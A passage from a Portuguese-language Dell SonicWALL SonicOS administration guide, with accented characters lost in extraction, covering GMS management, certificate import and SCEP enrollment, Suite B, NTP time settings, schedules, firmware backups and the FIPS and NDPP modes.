Para obter instrues sobre a adio de servios e regras para o Dispositivo de Segurana Dell
SonicWALL, consulte a seo de Firewall.

Se seu sistema de gerenciamento SNMP suportar a deteco, o firewall detectado
automaticamente na rede. Caso contrrio, voc deve adicionar o firewall na lista de
dispositivos gerenciados pelo SNMP no sistema de gerenciamento SNMP.
Ativando o gerenciamento GMS

Voc pode configurar o firewall para ser gerenciado pelo Sistema de gerenciamento global do
SonicWALL (Dell SonicWALL GMS).
Para configurar o firewall para o gerenciamento GMS:
Etapa 1 Marque a caixa de seleo Habilitar o gerenciamento usando GMS e, em seguida, clique em
Configurar. A janela Definir configuraes GMS exibida.
Etapa 2 Insira o nome de host GMS ou endereo IP do Console GMS no campo Nome de host GMS
ou endereo IP.
Etapa 3 Insira a porta no campo Porta do servidor de syslog GMS. O valor padro de 514.
Etapa 4 Selecione Enviar somente mensagens de status de pulsao para enviar somente status
de pulsao em vez de mensagens de log.
Etapa 5 Selecione GMS atrs de dispositivo NAT se o Console GMS estiver atrs de um dispositivo
usando NAT na rede. Digite o endereo IP do dispositivo NAT no campo Endereo IP do
dispositivo NAT.
Etapa 6 Selecione um dos seguintes modos GMS no menu Modo de gerenciamento.
Tnel de gerenciamento IPSEC - Selecionar esta opo permite que o firewall seja
gerenciados atravs de um tnel VPN IPsec para o console de gerenciamento GMS.
O padro de configurao IPsec VPN exibido. Selecione GMS atrs de dispositivo
NAT se aplicvel para a instalao do GMS e digite o endereo IP no campo Endereo
IP de dispositivo NAT. As configuraes de poltica VPN padro so exibidas na parte
inferior da janela Definir configuraes do GMS.
Tnel existente - Se essa opo for selecionada, o servidor GMS e o firewall j tm
um tnel VPN atravs da conexo. Insira o nome de host GMS ou endereo IP do
servidor no campo Nome de host GMS ou endereo IP. Insira o nmero da porta no
campo Porta do servidor de syslog.
HTTPS - Se essa opo for selecionada, o gerenciamento HTTPS permitido de dois
endereos IP: o Agente primrio de GMS e o endereo IP do Agente de espera. O
Dispositivo de Segurana Dell SonicWALL tambm envia pacotes criptografados
syslog e interceptaes SNMP usando 3DES e a senha do administrador do firewall.

Enviar mensagens de Syslog para um Servidor de relatrios GMS distribudo -
Envia mensagens de pulsao regulares para ambos os GMS Primrio e endereo IP
do Agente de espera. As mensagens de pulsao regulares so enviadas para o
servidor de relatrio GMS especificado e para a porta do servidor de relatrios.
Endereo IP de servidor de relatrios GMS - Digite o endereo IP do Servidor de
relatrios do GMS se o servidor estiver separado do servidor de gerenciamento GMS.
Porta do servidor de relatrio GMS - Insira a porta para o Servidor de Relatrios
GMS. O valor padro de 514.
URL de download
A seo URL de download fornece um campo para especificar o endereo do URL de um site
para fazer download de imagens do SonicPoint.
Especificar manualmente o URL da imagem SonicPoint-N - Se o seu firewall tem

conectividade com a Internet, ele far o download automaticamente da verso correta da
imagem do SonicPoint no servidor do Dell SonicWALL quando voc conectar um
dispositivo SonicPoint. Se o seu firewall no tiver acesso Internet ou tiver acesso
somente atravs de um servidor proxy, voc deve especificar manualmente um URL para
o firmware do SonicPoint. No necessrio incluir o prefixo http://, mas necessrio
incluir o nome do arquivo no final do URL. O nome de arquivo deve ter uma extenso .bin.
Aqui esto exemplos usando um endereo IP e um nome de domnio:
192.168.168.10/imagepath/sonicpoint.bin
software.sonicwall.com/applications/sonicpoint/sonicpoint.bin
Para obter mais informaes, consulte Atualizando firmware do SonicPoint na pgina 471.
Cuidado imperativo que voc faa download da imagem do SonicPoint correspondente para a
verso do firmware do SonicOS que est em execuo no seu firewall. O site da Web
mysonicwall.com fornece informaes sobre as verses correspondentes. Ao atualizar seu
firmware SonicOS, certifique-se de fazer o upgrade para a imagem SonicPoint correta.
Seleo de idioma a UI:

Se seu firmware contm outros idiomas alm do Portugus, eles podem ser selecionados no
menu suspenso Seleo de idioma.
Nota Alterar o idioma da UI do SonicOS requer que o firewall seja reinicializado.

Captulo 6
Gerenciando Certificados
Sistema > Certificados

Para implementar o uso de certificados para polticas de VPN, deve-se localizar uma origem
de um certificado de autoridade de certificao vlido de um servio de autoridade de
certificao de terceiros. Depois que voc tiver um certificado de autoridade de certificao
vlido, poder import-lo para o firewall para validar os certificados locais. Importe o certificado
de autoridade de certificao vlido para o firewall usando a pgina Sistema > Certificados.
Depois que voc importar o certificado de autoridade de certificao vlido, poder us-lo para
validar os certificados locais.
Viso geral de certificados digitais na pgina 117
Certificados e solicitaes de certificados na pgina 118
Detalhes do certificado na pgina 119
Importando certificados na pgina 119
Excluindo um certificado na pgina 121
Gerando uma solicitao de assinatura de certificado na pgina 121
Configurando o protocolo de registro de certificado simples na pgina 123
Criptografia do Suite B na pgina 124
Viso geral de certificados digitais

Um certificado digital um meio eletrnico para verificar a identidade por um terceiro confivel
conhecido como uma autoridade de certificao (CA). O certificado padro X.509 v3 uma
especificao a ser usada com os certificados de criptografia e permite definir as extenses
que podem ser includas no certificado. SonicWALL implementou esse padro no suporte ao
certificado de terceiros.
possvel usar um certificado assinado e verificado por uma autoridade de certificao de
terceiro a ser usada com uma poltica de VPN de IKE (Troca de Chave de Internet). IKE uma
parte importante das solues de VPN de IPsec e pode usar certificados digitais para
autenticar dispositivos de mesmo nvel antes de configurar SAs. Sem certificados digitais, os
usurios de VPN devem se autenticar trocando manualmente as chaves simtricas ou
Gerenciando Certificados | 117

segredos compartilhados. Dispositivos ou clientes que usam assinaturas digitais no requerem
alteraes de configurao a cada vez que um novo dispositivo ou cliente for adicionado
rede.
Um certificado tpico consiste em duas sees: uma seo de dados e uma seo de
assinatura. A seo de dados normalmente contm informaes, como a verso do X.509
suportada pelo certificado, um nmero de srie do certificado, as informaes sobre a chave
pblica do usurio, o nome distinto (DN), o perodo de validao para o certificado e as
informaes opcionais, como o uso de destino do certificado. A seo de assinatura inclui o
algoritmo de criptografia usado pela emisso da autoridade de certificao e a assinatura
digital da autoridade de certificao.
Os dispositivos de segurana Dell SonicWALL interagem com qualquer provedor de
Certificados compatvel ao X.509v3. Os dispositivos de segurana Dell SonicWALL foram
testados com os seguintes fornecedores de Certificados de autoridade de certificao:
Entrust
Microsoft
OpenCA
OpenSSL
VeriSign
Certificados e solicitaes de certificados

A seo Certificado e solicitaes de certificados fornece todas as configuraes de
gerenciamento de autoridade de certificao e certificados locais.
O menu Ver estilo permite exibir o certificado na tabela Certificados e solicitaes de
certificados com base nos seguintes critrios:
Todos os certificados - exibe todos os certificados e solicitaes de certificados.
Certificados importados e solicitaes - exibe todos os certificados importados e as
solicitaes geradas dos certificados.

Certificados integrados - exibe todos os certificados includos com o dispositivo de
segurana Dell SonicWALL.
Incluir certificados expirados e integrados - exibe todos os certificados expirados e
integrados.
A tabela Certificados e solicitaes de certificados exibe as seguintes informaes sobre
os certificados:
Certificado - o nome do certificado.
Tipo -o tipo de certificado, que pode incluir a autoridade de certificao ou local.
Validado - as informaes de validao.
Expira - a data e a hora de expirao do certificado.
Detalhes - os detalhes do certificado. Mover o ponteiro sobre o cone exibe os
detalhes do certificado.
Configurar - exibe os cones Editar e Excluir para editar ou excluir uma entrada
de certificado.
Tambm exibe o cone Importar para importar as listas de revogao de

certificados (para certificados de autoridade de certificao) ou de certificados
assinados (para solicitaes pendentes).
Detalhes do certificado
Clicar no cone na coluna Detalhes da tabela Certificados e solicitaes de certificados
lista as informaes sobre o certificado, que podem incluir o seguinte, dependendo do tipo de
certificado:
Emissor de certificado
Nome distinto do assunto
Nmero de srie do certificado
Vlido de
Expira em
Status (para solicitaes e certificados locais pendentes)
Status de CRL (para certificados de autoridade de certificao)
Os detalhes mostrados no pop-up de mouseover Detalhes dependem do tipo de certificado.
Emissor de certificado, Nmero de srie do certificado, Vlido de, e Expira em no so
mostrados para solicitaes pendentes desde que essas informaes sejam geradas pelo
provedor de certificados. Da mesma forma, as informaes de Status de CRL so mostradas
apenas para certificados de autoridade de certificao e variam de acordo com a configurao
do certificado de autoridade de certificao.
Importando certificados
Aps o servio de autoridade de certificao ter emitido um certificado para a solicitao
pendente ou ter, de outra forma, fornecido um certificado local, ser possvel import-lo para
uso em autenticao de gerenciamento da web ou VPN. Os certificados de autoridade de
certificao tambm podem ser importados para verificar os certificados locais e certificados
de mesmo nvel usados na negociao IKE.

Importando um certificado de autoridade de certificao
Para importar um certificado de uma autoridade de certificao, execute estas etapas:
Etapa 1 Clique em Importar. A janela Importar certificado exibida.
Etapa 2 Selecione Importar um certificado de autoridade de certificao de um arquivo codificado

PKCSn7 (*.p7b) ou DER (.der ou .cer). As configuraes da janela Importar certificado so
alteradas.
Etapa 3 Insira o caminho para o arquivo de certificado no campo Selecione um arquivo a ser
importado ou clique em Procurar para localizar o arquivo de certificado e, em seguida, clique
em Abrir para definir o caminho do diretrio para o certificado.
Etapa 4 Clique em Importar para importar o certificado para o firewall. Depois que ele for importado,
ser possvel ver a entrada de certificado na tabela Certificados e solicitaes de
certificados.
Etapa 5 Mover o ponteiro para o cone na coluna Detalhes exibe as informaes de detalhes do
certificado.

Importando um certificado local
Para importar um certificado local, execute estas etapas:
Etapa 1 Clique em Importar. A janela Importar certificado exibida.
Etapa 2 Insira um nome de certificado no campo Nome de certificado.

Etapa 3 Insira a senha usada pela autoridade de certificao para criptografar o arquivo PKCSn12 no
campo Senha de gerenciamento de certificado.
Etapa 4 Insira o caminho para o arquivo de certificado no campo Selecione um arquivo a ser
importado ou clique em Procurar para localizar o arquivo de certificado e, em seguida, clique
em Abrir para definir o caminho do diretrio para o certificado.
Etapa 5 Clique em Importar para importar o certificado para o firewall. Depois que ele for importado,
ser possvel ver a entrada de certificado na tabela Certificados e solicitaes de
certificados.
Etapa 6 Mover o ponteiro para o cone na coluna Detalhes exibe as informaes de detalhes do
certificado.
Excluindo um certificado
Para excluir o certificado, clique no cone de excluso. Ser possvel excluir um certificado, se
ele tiver expirado ou, se voc decidir no usar certificados de terceiros para a autenticao de
VPN.
Gerando uma solicitao de assinatura de certificado
Dica Deve-se criar uma poltica de certificado a ser usado em conjunto com os certificados
locais. Uma poltica de certificado determina os requisitos de autenticao e os limites de
autoridade necessrios para a validao de um certificado.

Para gerar um certificado local, siga estas etapas:
Etapa 1 Clique no boto nova solicitao de assinatura. A janela de Solicitao de assinatura de

certificado exibida.
Etapa 2 Na seo Gerar solicitao de assinatura de certificado, insira um nome de alias para o
certificado no campo Alias de certificado.
Etapa 3 Selecione o tipo de campo Solicitao no menu, em seguida, insira as informaes para o
certificado nos campos Solicitao. Conforme voc insere as informaes nos campos de
solicitao, o nome distinto (DN) criado no campo Nome distinto do assunto.
Tambm possvel anexar um Nome alternativo do assunto ao certificado, como o
Nome de domnio ou o Endereo de e-mail.
Etapa 4 O tipo Chave de assunto predefinido como um algoritmo RSA. RSA um algoritmo de
criptografia de chave pblica usado para criptografar dados.
Etapa 5 Selecione um tamanho de chave de assunto no menu Tamanho da chave de assunto.

Nota Nem todos os tamanhos de chave so suportados por uma autoridade de certificao,
portanto, deve-se verificar com a autoridade de certificao os tamanhos de chave
suportados.
Etapa 6 Clique em Gerar para criar um arquivo de solicitao de assinatura de certificado. Depois que
a Solicitao de assinatura de certificado for gerada, uma mensagem que descreve o
resultado ser exibida.
Etapa 7 Clique em Exportar para baixar o arquivo no computador, em seguida, clique em Salvar para
salv-lo em um diretrio no computador. Voc gerou a Solicitao de certificado que
possvel enviar autoridade de certificao para validao.
Configurando o protocolo de registro de certificado simples

O SCEP (protocolo de registro de certificado simples) foi projetado para oferecer suporte
emisso de certificados para dispositivos de rede de maneira escalvel. H dois cenrios de
registro de SCEP:
A autoridade de certificao do servidor SCEP emite certificados automaticamente
A solicitao SCEP definida como PENDENTE e o administrador de autoridade de
certificao emite o certificado manualmente.
Mais informaes sobre SCEP podem ser encontradas em:
http://Tools.ietf.org/HTML/Draft-nourse-SCEP-18
White paper de implementao do Microsoft SCEP
Para usar SCEP para emitir certificados, siga estas etapas:
Etapa 1 Gere uma solicitao de assinatura, conforme descrito acima no Gerando uma solicitao de
assinatura de certificado na pgina 121.
Etapa 2 Role para o boto da pgina Sistema > Certificados e clique no boto SCEP. A janela
Configurao de SCEP exibida.
Etapa 3 No menu suspenso Lista de CSR, a interface com o usurio selecionar automaticamente uma
lista de CSR padro. Se voc tiver diversas listas de CSR configuradas, poder modificar isso.
Etapa 4 No campo URL de autoridade de certificado, insira a URL para a autoridade de certificao.

Etapa 5 Se estiver no campo Senha de desafio, digite a senha para a autoridade de certificao, se
uma for necessria.
Etapa 6 No campo Intervalo(s) de sondagem, possvel modificar o valor padro para a durao de
tempo em segundos entre quando as mensagens de pesquisa so enviadas.
Etapa 7 No campo Tempo(s) mximo(s) de pesquisa, possvel modificar o valor padro para a
durao de tempo em que o firewall aguardar uma resposta para uma mensagem de
sondagem antes do tempo limite.
Etapa 8 Clique no boto Scep para enviar o registro de SCEP.
O firewall, em seguida, entrar em contato com a autoridade de certificao para solicitar o
certificado. A durao de tempo que isso levar depende se a autoridade de certificao emite
certificados automaticamente ou manualmente. A pgina Log > Ver exibir mensagens sobre
o status do registro SCEP e da emisso do certificado. Depois que o certificado for emitido, ele
ser exibido na lista de certificados disponveis na pgina Sistema > Certificados, na
categoria Certificados e solicitaes importados.
Criptografia do Suite B
Suite B um conjunto de algoritmos criptogrficos promulgado pela Agncia de Segurana
Nacional, como parte de seu Programa de Modernizao de Criptografia. Ele serve como uma
base de criptografia interopervel para obter informaes confidenciais e no confidenciais. A
criptografia de Suite B aprovada pelo NIST (National Institute of Standards and Technology)
para uso do governo dos EUA.
Nota H tambm um Suite A, que definido pela ANS, mas utilizado principalmente em
aplicativos onde o Suite B no adequado.
A maioria dos componentes do Suite B so adotados da norma FIPS.

Os componentes do Suite B so os seguintes:
Advanced Encryption Standard (AES) com tamanhos de chave de 128 e 256 bits.
(Fornece proteo adequada para informaes confidenciais at o nvel SECRETO.)
Elliptic Curve Digital Signature Algorithm (ECDSA) - assinaturas digitais.
Elliptic Curve Diffie-Hellman (ECDH) - contrato de chave.
Secure Hash Algorithm 2 (SHA-256 e SHA-384) - resumo da mensagem.
(Fornece proteo adequada para informaes confidenciais at o nvel TOP SECRET.)
Configurao da criptografia do Suite B

Para configurar a criptografia do Suite B no SonicOS:
Etapa 1 Navegue at a pgina Sistema > Administrao.

Etapa 2 Selecione a opo Habilitar o modo suite B em HTTPS.
Etapa 3 Clique no boto Aceitar.

Etapa 4 Navegue at a pgina Sistema > Certificados.

Etapa 5 Clique no boto Importar. A caixa de dilogo Importar certificado exibida.
Etapa 6 Para Suite B, selecione a opo Importar um certificado de usurio final local com chave
privada de um arquivo codificado PKCS#12 (.p12 ou .pfx).
Etapa 7 Na caixa Nome do certificado, insira o nome do certificado ECDSA desejado.
Etapa 8 Na caixa Senha de gerenciamento de certificado, insira a senha para seu certificado.
Etapa 9 No menu Selecione um arquivo a ser importado, selecione o certificado ECDSA desejado.
Etapa 10 Clique no boto Importar.
Etapa 11 Gere uma solicitao de assinatura de certificado seguindo as etapas em Gerando uma
solicitao de assinatura de certificado na pgina 121.

Captulo 7
Configurando definies de Hora
Sistema > Hora

A pgina Sistema > Hora define as configuraes de data e hora para eventos de log de
registro de data/hora, para atualizar automaticamente os servios de segurana da
SonicWALL e para outros fins internos.
Por padro, o dispositivo de segurana da Dell SonicWALL usa uma lista interna de servidores
NTP pblicos para atualizar automaticamente a hora. O Network Time Protocol (NTP) um
protocolo usado para sincronizar as horas de relgio do computador em uma rede de
computadores. O NTP usa o Tempo Universal Coordenado (UTC) para sincronizar as horas de
relgio do computador para um milissegundo e, s vezes, para uma frao de um
milissegundo.
Configurando definies de Hora | 127

Hora do sistema
Para selecionar atualizar a hora automaticamente, escolha o fuso horrio no menu Fuso
horrio. Definir hora automaticamente usando NTP ativado, por padro, para usar
servidores NTP (Network Time Protocol) de uma lista interna para definir a hora
automaticamente. Ajustar o relgio automaticamente para a hora de vero tambm
ativado, por padro, para habilitar ajustes automticos para a hora de vero.
Se voc desejar definir sua hora manualmente, desmarque Definir hora automaticamente
usando NTP. Selecione a hora no formato de 24 horas usando os menus Hora (hh:mm:ss) e
a data nos menus Data.
Selecionar Exibir UTC nos logs (em vez de hora local) especifica o Tempo Universal
Coordenado (UTC), em vez da hora local para eventos de log.
Selecionar Exibir data no formato internacional exibe a data no formato internacional, com
o dia precedente ao ms.
Selecionar Usar apenas servidores NTP personalizados direciona o SonicOS a usar a lista
de servidores NTP inserida manualmente para definir o relgio do firewall, em vez de usar a
lista interna de servidores NTP.
Aps selecionar as configuraes de hora do sistema, clique em Aceitar.
Configuraes de NTP
Network Time Protocol (NTP) um protocolo usado para sincronizar as horas de relgio do
computador em uma rede de computadores. O NTP usa o Tempo Universal Coordenado (UTC)
para sincronizar as horas de relgio do computador para um milissegundo e, s vezes, para
uma frao de um milissegundo.
Dica O dispositivo de segurana da Dell SonicWALL usa uma lista interna de servidores NTP,
portanto, inserir manualmente um servidor NTP opcional.
Selecione Usar NTP para definir a hora automaticamente, se voc desejar usar o servidor
local para definir o relgio do firewall. Tambm possvel configurar Atualizar intervalo
(minutos) para que o servidor NTP atualize o firewall. O valor padro de 60 minutos.
Para adicionar um servidor NTP para a configurao do firewall
Etapa 1 Clique em Adicionar. A janela Adicionar servidor NTP exibida.

Etapa 2 Digite o endereo IP de um servidor NTP no campo Servidor NTP.
Etapa 4 Clique em Aceitar na pgina Sistema > Hora para atualizar o firewall.
Para excluir um servidor NTP, destaque o endereo IP e clique em Excluir. Ou, clique em
Excluir tudo para excluir todos os servidores.

Captulo 8
Definindo programaes
Sistema > Programaes

A pgina Sistema > Programaes permite criar e gerenciar objetos de programao para
impor tempos de programao para uma variedade de recursos do dispositivo de segurana
da Dell SonicWALL.
Definindo programaes | 129

A tabela Programaes exibe todas as programaes predefinidas e personalizadas. Na
tabela Programaes, h trs programaes padro: Horas de trabalho, Horas aps e
Horas de final de semana. possvel modificar essas programaes clicando no cone de
edio na coluna Configurar para exibir a janela Editar programao.
Nota No possvel excluir as programaes padro Horas de trabalho, Horas aps ou Horas
de final de semana.
Aplique objetos de programao para o recurso de segurana especfico. Por exemplo, se

voc adicionar uma regra de acesso na pgina Firewall > Regras de acesso, a janela
Adicionar regra fornecer um menu suspenso de todos os objetos de programao
disponveis criados na pgina Sistema > Programaes.
Uma programao pode incluir vrios incrementos de dia e hora para a imposio de regra com
uma nica programao. Se uma programao incluir vrias entradas de dia e hora, um boto
de seta para a direita aparecer prximo ao nome da programao. Clicar no boto
expande a programao para exibir todas as entradas de dia e hora para a programao.

Adicionando uma programao
Para criar programaes, clique em Adicionar. A janela Adicionar programao exibida.
Etapa 1 Insira um nome descritivo para a programao no campo Nome.

Etapa 2 Selecione um dos seguintes botes de opo para o Tipo de programao.
Uma vez para uma programao de uma vez entre as datas e horas de incio e de fim.
Quando selecionado, os campos em Uma vez se tornaro ativos e os campos em
Recorrente se tornaro inativos.
Recorrente para a programao que ocorre repetidamente durante as mesmas horas e
dias da semana configurados, sem data de incio ou de fim. Quando selecionado, os
campos em Recorrente se tornaro ativos e os campos em Uma vez se tornaro inativos.
Definindo programaes | 131

Misto para uma programao que ocorre repetidamente durante as mesmas horas e dias
da semana configurados, entre as datas configuradas de incio e de fim. Quando
selecionado, todos os campos na pgina se tornaro ativos.
Etapa 3 Se os campos em Uma vez estiverem ativos, configure a data e hora de incio, selecionando
o Ano, Ms, Data, Hora e Minuto nas listas suspensas na linha Incio. A hora representada
no formato de 24 horas.
Etapa 4 Em Uma vez, configure a data e hora de encerramento, selecionando o Ano, Ms, Data, Hora
e Minuto nas listas suspensas na linha final. A hora representada no formato de 24 horas.
Etapa 5 Se os campos em Recorrente estiverem ativos, marque as caixas de seleo para os dias da
semana a serem aplicados programao ou selecione Todos.
Etapa 6 Em Recorrente, digite a hora do dia para que a programao seja iniciada no campo Iniciar.
A hora deve estar no formato de 24 horas, por exemplo, 17:00 para 5 horas da tarde.
Etapa 7 Em Recorrente, digite a hora do dia para que a programao pare no campo Parar. A hora
deve estar no formato de 24 horas, por exemplo, 17:00 para 5 horas da tarde.
Etapa 8 Clique em Adicionar.
Etapa 9 Clique em OK para adicionar a programao na Lista de programao.
Etapa 10 Para excluir dias e horas existentes da Lista de programao, selecione a linha e clique em
Excluir. Ou, para excluir todas as programaes existentes, clique em Excluir tudo.
Excluindo Programaes
possvel excluir programaes personalizadas, mas no possvel excluir as programaes
padro Horas de trabalho, Horas aps ou Horas de final de semana.
Excluindo programaes individuais

Para excluir os objetos de programao individual criados, execute as seguintes etapas:
Etapa 1 Na pgina Sistema > Programaes na tabela Programaes, marque a caixa de seleo
prxima entrada da programao para habilitar o boto Excluir.
Etapa 2 Clique em Excluir.
Excluindo todas as programaes

Para excluir todos os objetos de programao criados:
Etapa 1 Na pgina Sistema > Programaes na tabela Programaes, marque a caixa de seleo
prxima ao cabealho de coluna Nome para selecionar todas as programaes.
Etapa 2 Clique em Excluir.

Captulo 9
Gerenciando firmware de dispositivo de
segurana da Dell SonicWALL
Sistema > Configuraes

Essa pgina Sistema > Configuraes permite gerenciar as preferncias e as verses
SonicOS do firewall.

Configuraes na pgina 134
Gerenciamento de firmware na pgina 135
Atualizao automtica do firmware na pgina 137
FIPS na pgina 137
NDPP na pgina 138
Gerenciando firmware de dispositivo de segurana da Dell SonicWALL | 133

Configuraes
Importar configuraes
Para importar um arquivo de preferncias salvo anteriormente para o firewall, siga estas
instrues:
Etapa 1 Clique em Importar configuraes para importar um arquivo de preferncias exportado

anteriormente para o firewall. A janela Importar configuraes exibida.
Etapa 2 Clique em Procurar para localizar o arquivo que tem uma extenso de nome de arquivo *.exp.
Etapa 3 Selecione o arquivo de preferncias.
Etapa 4 Clique em Importar e reinicie o firewall.
Exportar configuraes
Para exportar as definies de configurao do firewall, use as instrues a seguir:
Etapa 1 Clique em Exportar configuraes. A janela Exportar configuraes exibida.

Etapa 2 Clique em Exportar.
Etapa 3 Clique em Salvar e, em seguida, selecione um local para salvar o arquivo. O arquivo
denominado "sonicwall.exp", mas pode ser renomeado.
Etapa 4 Clique em Salvar. Esse processo pode levar at um minuto. O arquivo de preferncias
exportado poder ser importado para o firewall, se for necessrio reconfigurar o firmware.
Enviar relatrios de diagnstico

Clique em Enviar relatrios de diagnstico para enviar diagnsticos do sistema ao suporte
tcnico da SonicWALL. A barra de status na parte inferior da tela exibir "Aguarde!" ao enviar
o relatrio e, em seguida, exibir "Relatrios de diagnstico enviados com xito".

Gerenciamento de firmware
A seo Gerenciamento de firmware fornece as configuraes que permitem fcil
gerenciamento de atualizao e de preferncias de firmware. A seo Gerenciamento de
firmware permite:
Carregar e baixar imagens de firmware e configuraes do sistema.
Inicializar com sua escolha de configuraes de firmware e sistema.
Gerenciar backups de sistema.
Retornar facilmente seu dispositivo de segurana da Dell SonicWALL para o estado
anterior do sistema.
Nota O dispositivo de segurana da Dell SonicWALL SafeMode, que usa as mesmas

configuraes usadas em Gerenciamento de firmware, fornece recuperao rpida de
estados de configurao incertos.
Tabela Gerenciamento de firmware

A tabela Gerenciamento de firmware exibe as seguintes informaes:
Imagem de firmware - nessa coluna, os tipos de imagens de firmware so listados:
Firmware atual - firmware carregado no momento no firewall.
Firmware atual com configuraes padro de fbrica - reinicializar usando esta
imagem de firmware reconfigura o firewall para seus endereos IP, nome de usurio e
senha padro.
Firmware atual com configuraes de backup - uma imagem de firmware criada
clicando em Criar backup.
Firmware transferido por upload - a verso mais recente transferida por upload a
partir de mysonicwall.com.
Firmware transferido por upload com configuraes padro de fbrica - a verso
mais recente transferida por upload com as configuraes padro de fbrica.
Backup de sistema - as configuraes de backup e imagem de firmware de backup
para o dispositivo.
Verso - a verso do firmware.
Data - o dia, data e hora do download do firmware.
Tamanho - o tamanho do arquivo de firmware em Megabytes (MB).
Download - clicar no cone salva o arquivo de firmware em um novo local no computador
ou na rede. Apenas o firmware transferido por upload pode ser salvo em um local diferente.
Inicializar - clicar no cone reinicializa o firewall com a verso de firmware listada na
mesma linha.
Cuidado Clicar em Inicializar prximo a qualquer imagem de firmware substitui a imagem de

firmware atual existente tornando-a imagem de Firmware atual.
Cuidado Ao fazer upload de firmware no firewall, no deve-se interromper o navegador da web

fechando o navegador, clicando em um link ou carregando uma nova pgina. Se o
navegador for interrompido, o firmware poder ficar corrompido.

Atualizando o firmware manualmente
Clique em Carregar novo firmware... para carregar o novo firmware no dispositivo de
segurana da Dell SonicWALL. A janela Carregar firmware exibida. Navegue at o arquivo
de firmware localizado no disco local. Clique em Carregar para carregar o novo firmware no
Criando uma imagem de firmware de backup

Ao clicar em Criar backup..., o dispositivo de segurana da Dell SonicWALL tira uma "captura
instantnea" do estado atual do sistema, das preferncias de configurao e firmware e a torna
a nova imagem de firmware do backup do sistema. Clicar em Criar backup... substitui a
imagem de firmware do Backup do sistema, conforme necessrio.
Gerenciamento de firmware
A tabela Gerenciamento de firmware contm as seguintes colunas:
Imagem de firmware - nesta coluna, cinco tipos de imagens de firmware so listados:
Firmware atual, firmware carregado atualmente no firewall
Firmware atual com configuraes padro de fbrica, reinicializar usando esta
imagem de firmware reconfigura o firewall para seus endereos IP, nome de usurio e
senha padro
Backup do sistema - firmware inicial carregado no dispositivo de segurana da Dell
SonicWALL.
Verso - a verso do firmware est listada nessa coluna.
Data - o dia, data e hora do download do firmware.
Tamanho - o tamanho do arquivo de firmware em Megabytes (MB).
Download - clicar no cone salva o arquivo de firmware em um novo local no
computador ou na rede. Apenas o firmware transferido por upload pode ser salvo em um
local diferente.
Inicializar - clicar no cone reinicia o firewall com a verso do firmware listada na mesma
linha.
Nota Clicar em Inicializar prximo a qualquer imagem de firmware substitui a imagem de

firmware atual existente tornando-a a imagem de Firmware atual.
Clique em Inicializar na linha de firmware de sua escolha para reiniciar o dispositivo de


Cuidado Selecione apenas a opo Inicializar com diagnsticos de firmware habilitado (se
disponvel), se instrudo pelo suporte tcnico da SonicWALL.
Atualizao automtica do firmware

O sistema operacional Sonic suporta o recurso de atualizao automtica do firmware, que
ajuda a garantir que o dispositivo de segurana da Dell SonicWALL tenha a verso mais
recente do firmware. A atualizao automtica do firmware contm as seguintes opes:
Habilitar atualizao automtica do firmware - exibir um cone de alerta quando uma
nova verso de firmware estiver disponvel.
Baixar novo firmware automaticamente quando disponvel - Baixa as verses do novo
firmware para o dispositivo de segurana da Dell SonicWALL, quando elas se tornarem
disponveis.
Cuidado As atualizaes de firmware esto disponveis somente para usurios registrados com um
contrato de suporte vlido. Voc deve registrar sua SonicWALL no
https://www.mysonicwall.com.
FIPS
Ao operar no Modo FIPS (Federal Information Processing Standard), o dispositivo de
segurana da Dell SonicWALL suporta a segurana compatvel ao FIPS 140-2. Entre os
recursos compatveis ao FIPS do dispositivo de segurana da Dell SonicWALL inclua PRNG
com base em SHA-1 e apenas algoritmos aprovados por FIPS suportados (DES, 3DES e AES
com SHA-1).
Nota O FIPS no SonicOS no est certificado com a Federal Information Processing Standard
(Norma Federal de Processamento de Informaes).
Selecione Habilitar modo FIPS para habilitar o dispositivo de segurana da Dell SonicWALL
em conformidade com FIPS. Ao verificar essa configurao, uma caixa de dilogo ser exibida
com a seguinte mensagem: Aviso! A modificao do modo FIPS desconectar todos os
usurios e reiniciar o dispositivo. Clique em OK para continuar.
Clique em OK para reinicializar o dispositivo de segurana no modo FIPS. Um segundo aviso
exibido. Clique em Sim para continuar a reinicializao. Para retornar operao normal,
desmarque a caixa de seleo Habilitar modo FIPS e reinicialize o firewall no modo no FIPS.
Cuidado Ao usar o dispositivo de segurana da Dell SonicWALL para operao compatvel ao FIPS,
o selo de evidncia de violao que fixado no dispositivo de segurana da Dell
SonicWALL deve permanecer no local e inalterado.
Para habilitar FIPPs e exibir uma lista de quais das suas configuraes atuais no so
permitidas ou no esto presentes:

Etapa 1 Acesse a pgina Sistemas > Configuraes.
Etapa 2 Role at o final da pgina e selecione a opo Habilitar modo FIPS.
NDPP
Um dispositivo de segurana de rede Dell SonicWALL pode ser habilitado para ser compatvel
com o Perfil de Proteo do Dispositivo de Rede (NDPP), mas algumas configuraes de
firewall no so permitidas ou so obrigatrias.
Nota O NDPP faz parte dos Critrios Comuns (CC) de certificao. No entanto, o NDPP no
SonicOS no est atualmente certificado.
Os objetivos de segurana para um dispositivo que alega conformidade com um Perfil de

Proteo so definidos da seguinte forma:
As TOEs (Metas de Avaliao) compatveis fornecero a funcionalidade de segurana que
lidar com as ameaas TOE e implementaro polticas que so impostas por lei ou por
regulamentos. A funcionalidade de segurana fornecida inclui comunicaes protegidas para
e entre elementos da TOE; acesso administrativo TOE e seus recursos de configurao;
monitoramento do sistema para a deteco de eventos de segurana pertinentes; controle de
disponibilidade de recursos; e a capacidade de verificar a fonte de atualizaes para a TOE.
Nota A opo Habilitar modo NDPP no pode ser habilitada ao mesmo tempo que a caixa de
seleo Habilitar modo FIPS, que tambm est localizada na pgina Sistema >
Configuraes.
Habilite o NDPP selecionando a opo Habilitar modo NDPP na pgina Sistema >
Configuraes. Depois de fazer isso, uma janela pop-up exibida com a lista de verificao
de conformidade da definio do modo NDPP. A lista de verificao mostra todas as definies
em sua configurao atual do SonicOS que violam a conformidade com o NDPP, para que voc
possa alter-las. necessrio acessar a interface de gerenciamento do SonicOS para realizar
as alteraes. A lista de verificao de um dispositivo com configuraes padro de fbrica
mostrada no procedimento a seguir.
Para habilitar o NDPP e exibir uma lista de quais das suas configuraes atuais no so
permitidas ou no esto presentes:
Etapa 1 Acesse a pgina Sistemas > Configuraes.

Etapa 2 Role at o final da pgina e selecione a opo Habilitar modo NDPP.

A caixa de dilogo Verificao da definio do modo NDPP exibida juntamente com uma
lista de suas configuraes obrigatrias e no permitidas. Na parte inferior da caixa de dilogo,
as seguintes mensagens podem ser exibidas:
O Dell SonicWALL no pode funcionar no modo NDPP com as definies acima.
Em primeiro lugar, alterar ou desabilitar manualmente as configuraes para estar em
